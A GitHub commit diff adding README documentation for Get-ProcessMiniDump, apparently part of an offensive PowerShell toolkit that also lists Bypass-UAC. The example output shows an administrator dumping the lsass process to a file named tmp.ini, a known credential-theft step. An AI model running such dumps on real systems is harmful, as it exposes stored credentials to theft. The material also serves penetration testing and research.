File tree Expand file tree Collapse file tree 1 file changed +41
-0
lines changed Expand file tree Collapse file tree 1 file changed +41
-0
lines changed Original file line number Diff line number Diff line change @@ -239,6 +239,47 @@ C:\PS> $Beep = $MicrosoftWin32UnsafeNativeMethods::GetProcAddress($Kernel32Ref,
239239C:\PS> $MicrosoftWin32SafeNativeMethods::MessageBox([IntPtr]::Zero,$("{0:X}" -f [int64]$Beep),"Beep",0)
240240```
241241
242+ ### Get-ProcessMiniDump
243+
244+ Create process dump using Dbghelp::MiniDumpWriteDump.
245+
246+ ```
247+ # Elevated user dumping elevated process
248+
249+ C:\PS> (Get-Process lsass).Id
250+ 528
251+
252+ C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 528 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
253+ VERBOSE: [?] Running as: Administrator
254+ VERBOSE: [?] Administrator privileges required
255+ VERBOSE: [>] Administrator privileges held
256+ VERBOSE: [>] Process dump success!
257+
258+ C:\PS> $CallResult
259+ True
260+
261+ # low priv user dumping low priv process
262+
263+ C:\PS> (Get-Process calc).Id
264+ 2424
265+
266+ C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 2424 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
267+ VERBOSE: [?] Running as: asenath.waite
268+ VERBOSE: [>] Process dump success!
269+
270+ C:\PS> $CallResult
271+ True
272+
273+ # low priv user dumping elevated process
274+ C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 4 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
275+ VERBOSE: [?] Running as: asenath.waite
276+ VERBOSE: [?] Administrator privileges required
277+ VERBOSE: [!] Administrator privileges not held!
278+
279+ C:\PS> $CallResult
280+ False
281+ ```
282+
242283## pwnd
243284
244285### Bypass-UAC
You can’t perform that action at this time.
0 commit comments